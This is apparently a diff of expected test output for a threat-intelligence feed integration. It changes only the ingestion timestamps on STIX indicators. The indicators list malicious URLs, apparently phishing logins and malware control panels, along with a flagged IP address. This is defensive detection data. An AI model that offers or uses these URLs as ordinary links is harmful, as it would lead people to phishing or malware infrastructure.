@@ -24348,7 +24348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025695300Z", + "ingested": "2021-12-14T14:57:43.118403709Z", "original": "{\"created\":\"2020-02-20T05:19:58.679Z\",\"description\":\"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--12edd75d-2558-498f-93a6-b628c3a21f85\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:19:58.679Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:58.679Z\"}", "category": "threat", "type": "indicator", @@ -24400,7 +24400,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025701Z", + "ingested": "2021-12-14T14:57:43.118404236Z", "original": "{\"created\":\"2020-02-20T05:21:46.589Z\",\"description\":\"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:21:46.589Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:21:46.589Z\"}", "category": "threat", "type": "indicator", 
@@ -24452,7 +24452,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025705200Z", + "ingested": "2021-12-14T14:57:43.118404619Z", "original": "{\"created\":\"2020-02-20T05:22:19.894Z\",\"description\":\"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--09479a9a-0c30-4029-a396-afa64343f065\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:22:19.894Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:22:19.894Z\"}", "category": "threat", "type": "indicator", @@ -24503,7 +24503,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025709600Z", + "ingested": "2021-12-14T14:57:43.118405009Z", "original": "{\"created\":\"2020-02-20T05:24:01.214Z\",\"description\":\"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-20T05:24:01.214Z\",\"name\":\"mal_url: http://f0402912.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0402912.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:01.214Z\"}", "category": "threat", "type": "indicator", 
@@ -24554,7 +24554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025734700Z", + "ingested": "2021-12-14T14:57:43.118405522Z", "original": "{\"created\":\"2020-02-20T05:24:21.239Z\",\"description\":\"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:24:21.239Z\",\"name\":\"mal_url: http://f0404052.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404052.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:21.239Z\"}", "category": "threat", "type": "indicator", @@ -24606,7 +24606,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025739600Z", + "ingested": "2021-12-14T14:57:43.118405993Z", "original": "{\"created\":\"2020-02-20T05:24:33.205Z\",\"description\":\"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T05:24:33.205Z\",\"name\":\"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:33.205Z\"}", "category": "threat", "type": "indicator", 
@@ -24651,7 +24651,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025748800Z", + "ingested": "2021-12-14T14:57:43.118406440Z", "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", "category": "threat", "type": "indicator", @@ -24703,7 +24703,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025754Z", + "ingested": "2021-12-14T14:57:43.118406886Z", "original": "{\"created\":\"2020-02-20T05:24:47.629Z\",\"description\":\"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:24:47.629Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.629Z\"}", "category": "threat", "type": "indicator", 
@@ -24755,7 +24755,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025759800Z", + "ingested": "2021-12-14T14:57:43.118407336Z", "original": "{\"created\":\"2020-02-20T05:24:47.645Z\",\"description\":\"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:24:47.645Z\",\"name\":\"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.645Z\"}", "category": "threat", "type": "indicator", @@ -24807,7 +24807,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025767Z", + "ingested": "2021-12-14T14:57:43.118407753Z", "original": "{\"created\":\"2020-02-20T05:25:26.502Z\",\"description\":\"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-20T05:25:26.502Z\",\"name\":\"mal_url: http://instaboom-hello.site/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://instaboom-hello.site/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.502Z\"}", "category": "threat", "type": "indicator", 
@@ -24859,7 +24859,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025773800Z", + "ingested": "2021-12-14T14:57:43.118408143Z", "original": "{\"created\":\"2020-02-20T05:25:26.525Z\",\"description\":\"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--592a57f8-b59a-4018-9167-307225a207ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:25:26.525Z\",\"name\":\"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.525Z\"}", "category": "threat", "type": "indicator", @@ -24911,7 +24911,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025780800Z", + "ingested": "2021-12-14T14:57:43.118408680Z", "original": "{\"created\":\"2020-02-20T05:25:29.508Z\",\"description\":\"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--56e543f4-111a-4764-af25-ee784f35a7c6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:25:29.508Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.508Z\"}", "category": "threat", "type": "indicator", 
@@ -24963,7 +24963,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025787600Z", + "ingested": "2021-12-14T14:57:43.118409498Z", "original": "{\"created\":\"2020-02-20T05:25:29.532Z\",\"description\":\"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-20T05:25:29.532Z\",\"name\":\"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.532Z\"}", "category": "threat", "type": "indicator", @@ -25015,7 +25015,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025794500Z", + "ingested": "2021-12-14T14:57:43.118409886Z", "original": "{\"created\":\"2020-02-21T02:51:41.341Z\",\"description\":\"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:51:41.341Z\",\"name\":\"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:41.341Z\"}", "category": "threat", "type": "indicator", 
@@ -25066,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025801300Z", + "ingested": "2021-12-14T14:57:43.118410335Z", "original": "{\"created\":\"2020-02-21T02:51:50.176Z\",\"description\":\"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:51:50.176Z\",\"name\":\"mal_url: http://j1041747.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1041747.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.176Z\"}", "category": "threat", "type": "indicator", @@ -25118,7 +25118,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025805300Z", + "ingested": "2021-12-14T14:57:43.118410860Z", "original": "{\"created\":\"2020-02-21T02:51:50.296Z\",\"description\":\"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-21T02:51:50.296Z\",\"name\":\"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.296Z\"}", "category": "threat", "type": "indicator", 
@@ -25170,7 +25170,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025810400Z", + "ingested": "2021-12-14T14:57:43.118411442Z", "original": "{\"created\":\"2020-02-21T02:52:28.296Z\",\"description\":\"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:52:28.296Z\",\"name\":\"mal_url: http://groysman.club/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groysman.club/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:28.296Z\"}", "category": "threat", "type": "indicator", @@ -25222,7 +25222,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025815500Z", + "ingested": "2021-12-14T14:57:43.118411924Z", "original": "{\"created\":\"2020-02-21T02:52:31.697Z\",\"description\":\"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:52:31.697Z\",\"name\":\"mal_url: http://nortonlilly.info/ace/ts/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace/ts/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:31.697Z\"}", "category": "threat", "type": "indicator", 
@@ -25274,7 +25274,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025837200Z", + "ingested": "2021-12-14T14:57:43.118412425Z", "original": "{\"created\":\"2020-02-21T02:52:33.704Z\",\"description\":\"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:52:33.704Z\",\"name\":\"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:33.704Z\"}", "category": "threat", "type": "indicator", @@ -25319,7 +25319,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025841Z", + "ingested": "2021-12-14T14:57:43.118412811Z", "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", "category": "threat", "type": "indicator", 
@@ -25371,7 +25371,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025846100Z", + "ingested": "2021-12-14T14:57:43.118413198Z", "original": "{\"created\":\"2020-02-21T02:52:35.038Z\",\"description\":\"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--03ea9edc-6654-4287-b452-988c85380295\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-21T02:52:35.038Z\",\"name\":\"mal_url: http://jusper.zzz.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:35.038Z\"}", "category": "threat", "type": "indicator", @@ -25423,7 +25423,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025850900Z", + "ingested": "2021-12-14T14:57:43.118413585Z", "original": "{\"created\":\"2020-02-21T02:52:38.593Z\",\"description\":\"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--99f64515-7513-4764-b278-987c5df8484b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:52:38.593Z\",\"name\":\"mal_url: http://azur.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://azur.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:38.593Z\"}", "category": "threat", "type": "indicator", 
@@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025855Z", + "ingested": "2021-12-14T14:57:43.118414037Z", "original": "{\"created\":\"2020-02-21T02:53:25.758Z\",\"description\":\"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-21T02:53:25.758Z\",\"name\":\"mal_url: http://d98527ix.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d98527ix.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:25.758Z\"}", "category": "threat", "type": "indicator", @@ -25526,7 +25526,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025859200Z", + "ingested": "2021-12-14T14:57:43.118414472Z", "original": "{\"created\":\"2020-02-21T02:53:31.865Z\",\"description\":\"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:53:31.865Z\",\"name\":\"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.865Z\"}", "category": "threat", "type": "indicator", 
@@ -25578,7 +25578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025862500Z", + "ingested": "2021-12-14T14:57:43.118414928Z", "original": "{\"created\":\"2020-02-21T02:53:31.9Z\",\"description\":\"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime\",\"id\":\"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-21T02:53:31.9Z\",\"name\":\"mal_url: http://perca.ir/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://perca.ir/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.9Z\"}", "category": "threat", "type": "indicator", @@ -25630,7 +25630,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025867400Z", + "ingested": "2021-12-14T14:57:43.118415327Z", "original": "{\"created\":\"2020-02-21T02:53:40.48Z\",\"description\":\"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:53:40.48Z\",\"name\":\"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:40.48Z\"}", "category": "threat", "type": "indicator", 
@@ -25682,7 +25682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025873900Z", + "ingested": "2021-12-14T14:57:43.118415715Z", "original": "{\"created\":\"2020-02-21T02:53:42.327Z\",\"description\":\"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--c9d733d6-25c7-4306-9246-c08194e3073a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-21T02:53:42.327Z\",\"name\":\"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:42.327Z\"}", "category": "threat", "type": "indicator", @@ -25734,7 +25734,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025879800Z", + "ingested": "2021-12-14T14:57:43.118416093Z", "original": "{\"created\":\"2020-02-21T02:53:58.967Z\",\"description\":\"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-21T02:53:58.967Z\",\"name\":\"mal_url: http://liweff.eu/kp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/kp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:58.967Z\"}", "category": "threat", "type": "indicator", 
@@ -25786,7 +25786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025886700Z", + "ingested": "2021-12-14T14:57:43.118416484Z", "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", "category": "threat", "type": "indicator", @@ -25831,7 +25831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025893400Z", + "ingested": "2021-12-14T14:57:43.118416964Z", "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", "category": "threat", "type": "indicator", 
@@ -25883,7 +25883,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025900100Z", + "ingested": "2021-12-14T14:57:43.118417431Z", "original": "{\"created\":\"2020-02-22T02:52:52.6Z\",\"description\":\"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime\",\"id\":\"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-22T02:52:52.6Z\",\"name\":\"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:52.6Z\"}", "category": "threat", "type": "indicator", @@ -25935,7 +25935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025906700Z", + "ingested": "2021-12-14T14:57:43.118417890Z", "original": "{\"created\":\"2020-02-22T02:52:53.322Z\",\"description\":\"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:52:53.322Z\",\"name\":\"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.322Z\"}", "category": "threat", "type": "indicator", 
